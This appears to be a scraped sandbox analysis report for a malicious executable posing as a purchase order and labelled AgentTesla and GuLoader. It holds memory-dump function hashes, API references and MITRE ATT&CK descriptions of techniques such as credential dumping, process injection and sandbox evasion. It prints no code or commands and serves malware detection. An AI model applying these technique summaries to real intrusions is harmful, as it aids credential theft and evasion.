Source File: 0000000A.00000002.219004066211.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7870db8097fcceaee9e91bb2ea68af06cacf9ada723de89c4991312e78eaa3b6
Instruction ID: 93ebc0983ab5dfc98cb49f28db57a1c69aad26b51c7f4352b2277c81b9b38568
Opcode Fuzzy Hash: 7870db8097fcceaee9e91bb2ea68af06cacf9ada723de89c4991312e78eaa3b6
Instruction Fuzzy Hash: 0F220974A052288FCB64DF74C88879DB7B6BF88305F6085EAD509A3744EB349E85CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00E47567, Relevance: 2.0, APIs: 1, Instructions: 452libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00E476AF

Memory Dump Source

Source File: 0000000A.00000002.219004066211.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: dc8bef5fdd4758bb19a78808cae67b683960fcd883bf382c6e91b7f8a95f9ed0
Instruction ID: 52b3ac023ec4776e35c7825d2f88c255232eb18ca9046ec9e2f06472aade31d7
Opcode Fuzzy Hash: dc8bef5fdd4758bb19a78808cae67b683960fcd883bf382c6e91b7f8a95f9ed0
Instruction Fuzzy Hash: 67220974A052288FCB64DF74C88879DB7B6BF88305F2085EAD509A3744EB349E85CF94

Uniqueness

Uniqueness Score: -1.00%

Function 014C81F0, Relevance: 1.9, APIs: 1, Instructions: 393libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 014C854F

Memory Dump Source

Source File: 0000000A.00000002.219006841322.00000000014C0000.00000040.00000010.sdmp, Offset: 014C0000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ae96dcc99b103f7323c231e62e07b6f5f51f209e8ce09dce642352802c03168a
Instruction ID: a2d34fe604a1377899f399a97f88001f8690985bfd5b8a2a9f1d50b48e4e3ced
Opcode Fuzzy Hash: ae96dcc99b103f7323c231e62e07b6f5f51f209e8ce09dce642352802c03168a
Instruction Fuzzy Hash: 28D1D334B0020A8FDB51DBB8C8847EEB7B6EF85704F14886AE405DB3A2EB35DC458761

Uniqueness

Uniqueness Score: -1.00%

Function 0103BBC0, Relevance: 1.7, APIs: 1, Instructions: 180libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0103BC01

Memory Dump Source

Source File: 0000000A.00000002.219004569650.0000000001030000.00000040.00000010.sdmp, Offset: 01030000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a0c711979e5c03be3b5241255576307da78898eaf0e655ea88ed586e91212009
Instruction ID: 61e26d8e5e3b0cded05af597bdb5facbbeae5affea5144203fd0557c7b8f6201
Opcode Fuzzy Hash: a0c711979e5c03be3b5241255576307da78898eaf0e655ea88ed586e91212009
Instruction Fuzzy Hash: 6F61A234A00319DBDB14EFB4C4897AEBBF6AF84349F108429E546A7390DF78A845CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00F1471C, Relevance: 1.6, APIs: 1, Instructions: 129threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(F923FDC0), ref: 00F14818

Memory Dump Source

Source File: 0000000A.00000002.219004343907.0000000000F14000.00000040.00000001.sdmp, Offset: 00F14000, based on PE: false

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: f8311bac2922f0976ff9e2afd2849fbffc483e8c9ee4e1a66aa5b2efe066b319
Instruction ID: 3f26b315d90fbf609fbe270a93341af4ab225b6972708ea0ad540726cf817c83
Opcode Fuzzy Hash: f8311bac2922f0976ff9e2afd2849fbffc483e8c9ee4e1a66aa5b2efe066b319
Instruction Fuzzy Hash: B041486451939AEEDF309F74D1683E9BFA2AF96321F1E45EEC8C50A056C73466C0DB02

Uniqueness

Uniqueness Score: -1.00%

Function 00F146BD, Relevance: 1.6, APIs: 1, Instructions: 125threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(F923FDC0), ref: 00F14818

Memory Dump Source

Source File: 0000000A.00000002.219004343907.0000000000F14000.00000040.00000001.sdmp, Offset: 00F14000, based on PE: false

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 44f7fc90d174af8b50c9fb0e04f75e210e769b69fafb820eb8ed42ea30064a13
Instruction ID: c3f24f32b0f526742faf76aaf9ae4dc776d277d75ded2b34d2cc5be9abe5620e
Opcode Fuzzy Hash: 44f7fc90d174af8b50c9fb0e04f75e210e769b69fafb820eb8ed42ea30064a13
Instruction Fuzzy Hash: A5310A31548302CFDF249F64C5A47E577A1EFD2760F1692AACC864B095C338A9C4EB07

Uniqueness

Uniqueness Score: -1.00%

Function 00F14702, Relevance: 1.6, APIs: 1, Instructions: 115threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(F923FDC0), ref: 00F14818

Memory Dump Source

Source File: 0000000A.00000002.219004343907.0000000000F14000.00000040.00000001.sdmp, Offset: 00F14000, based on PE: false

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 3a52eec385de492dbf8892dc0e8347131f572584955aadb29644f68e6d0611ca
Instruction ID: 27700cdb0d43a7a77f2fcea883182ab6fffd4b171921076c24a76dca992c033a
Opcode Fuzzy Hash: 3a52eec385de492dbf8892dc0e8347131f572584955aadb29644f68e6d0611ca
Instruction Fuzzy Hash: 63413574504356DEDF309F74D5A83E97BA1AF92760F1A41AACC860B0A2C7346AC0DB02

Uniqueness

Uniqueness Score: -1.00%

Function 00F14784, Relevance: 1.6, APIs: 1, Instructions: 111threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(F923FDC0), ref: 00F14818

Memory Dump Source

Source File: 0000000A.00000002.219004343907.0000000000F14000.00000040.00000001.sdmp, Offset: 00F14000, based on PE: false

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 3543cf8b5e6a242b68111791d0a3b42ae45a8c3a7cdc4654945e4ab14ee0a004
Instruction ID: ce47831a8255ff148d2156d678ff2857b16bc09c01349f8d8edbff84cb5e2dee
Opcode Fuzzy Hash: 3543cf8b5e6a242b68111791d0a3b42ae45a8c3a7cdc4654945e4ab14ee0a004
Instruction Fuzzy Hash: 46415964515396AECF309F74D1683E9BFA29F9A321F1E05FEC8C60B062C72466C0DB02

Uniqueness

Uniqueness Score: -1.00%

Function 0103BB60, Relevance: 1.6, APIs: 1, Instructions: 99libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0103BC01

Memory Dump Source

Source File: 0000000A.00000002.219004569650.0000000001030000.00000040.00000010.sdmp, Offset: 01030000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d39eb6c032de0fac2ad3d6e635d2e08c14ed4288c53b8360b64b22a534591138
Instruction ID: 4cdccd94d708edc75d053724d38dae03602931642e91b6a0aa06264c5b9733c3
Opcode Fuzzy Hash: d39eb6c032de0fac2ad3d6e635d2e08c14ed4288c53b8360b64b22a534591138
Instruction Fuzzy Hash: 11312430B093459FCB15DBB8C894BEDBBF1BF86308F0044A9D040AB292CB759845CB91

Uniqueness

Uniqueness Score: -1.00%

Function 1DD5D1FC, Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.219014653777.000000001DD5D000.00000040.00000001.sdmp, Offset: 1DD5D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74b24a6a279bd2c81840a48de629f561c95bcb7751ff15f9e432c0efde90cadb
Instruction ID: 35f2ecc7b345ed1c011111a50b1c903a03ccca7902bee3b1cdbbae1e60ec7a8e
Opcode Fuzzy Hash: 74b24a6a279bd2c81840a48de629f561c95bcb7751ff15f9e432c0efde90cadb
Instruction Fuzzy Hash: 8321B071604240EFDF059F58D984F6ABB75FB88714F24C569E9484A246C336D417CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 1DD5D3D8, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.219014653777.000000001DD5D000.00000040.00000001.sdmp, Offset: 1DD5D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9dd17e290b7877347b7c172807669d5d2b86bc945ec3891d51f4169c9779ac39
Instruction ID: a5380b6a7a8b17e41d6f0fab681102baed9ec8188663f6b7f2a22fac645466c5
Opcode Fuzzy Hash: 9dd17e290b7877347b7c172807669d5d2b86bc945ec3891d51f4169c9779ac39
Instruction Fuzzy Hash: 5E21E071604240DFDF05CF58D980B26BB79FB88728F20C569E8490B246C336E446CAB2

Uniqueness

Uniqueness Score: -1.00%

Function 1DD6D01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.219014750879.000000001DD6D000.00000040.00000001.sdmp, Offset: 1DD6D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1119acfe18cbe6b5abc36e51117c12918c7c796bd4a26fe00b77d9df95ed20ee
Instruction ID: 6798e0ed4b3bcc77aa7b5a21557fd9b9c20f07a80e58ddee73e8109763e1f231
Opcode Fuzzy Hash: 1119acfe18cbe6b5abc36e51117c12918c7c796bd4a26fe00b77d9df95ed20ee
Instruction Fuzzy Hash: E321F574644240DFDB05CF68E984B26BB65FB84718F24C969E8494B246C336D487CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 1DD6D005, Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.219014750879.000000001DD6D000.00000040.00000001.sdmp, Offset: 1DD6D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 893c081d58000046e4405ea93a51d72d4ed1365684773a9e50992117465c89a2
Instruction ID: c149dcc4d6a3fe5777979cb5b57d59b149a9b9e15fe6ad154d8a81179953c47e
Opcode Fuzzy Hash: 893c081d58000046e4405ea93a51d72d4ed1365684773a9e50992117465c89a2
Instruction Fuzzy Hash: 5C2181755487809FD702CF24E994B11BF71EB46314F24C5EAE8498F297C33AD85ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 1DD5D1F7, Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.219014653777.000000001DD5D000.00000040.00000001.sdmp, Offset: 1DD5D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1cecc620d5e0c4c50d8296bf77374ac0a337dc92d4bf94b4717c0c8c1684ae64
Instruction ID: bdc37ed719dbcbf783ab9c18dc81754a0b89a0f65b21a335ca25e96f552a842c
Opcode Fuzzy Hash: 1cecc620d5e0c4c50d8296bf77374ac0a337dc92d4bf94b4717c0c8c1684ae64
Instruction Fuzzy Hash: 032189B6504280DFDB02CF54D984B16BB72FB88310F2485A9E9084A656C33AD42BCBA2

Uniqueness

Uniqueness Score: -1.00%

Function 1DD5D3D3, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.219014653777.000000001DD5D000.00000040.00000001.sdmp, Offset: 1DD5D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42f4a0c4991d82751cf47daa969b174439f92ee7451cb3ffe4223be96ca690be
Instruction ID: 4c39d23f1077f386fbb77aec483c1e3c4b89844768350b600e71e0585b9e820b
Opcode Fuzzy Hash: 42f4a0c4991d82751cf47daa969b174439f92ee7451cb3ffe4223be96ca690be
Instruction Fuzzy Hash: CA11AF76504280DFDF01CF14D5C4B16BF72FB84324F24C6A9E9490B656C33AE456CBA2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report Purchase Order PO20211027STK.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Agenttesla

Threatname: GuLoader

Yara Overview

Memory Dumps

Sigma Overview

Jbx Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre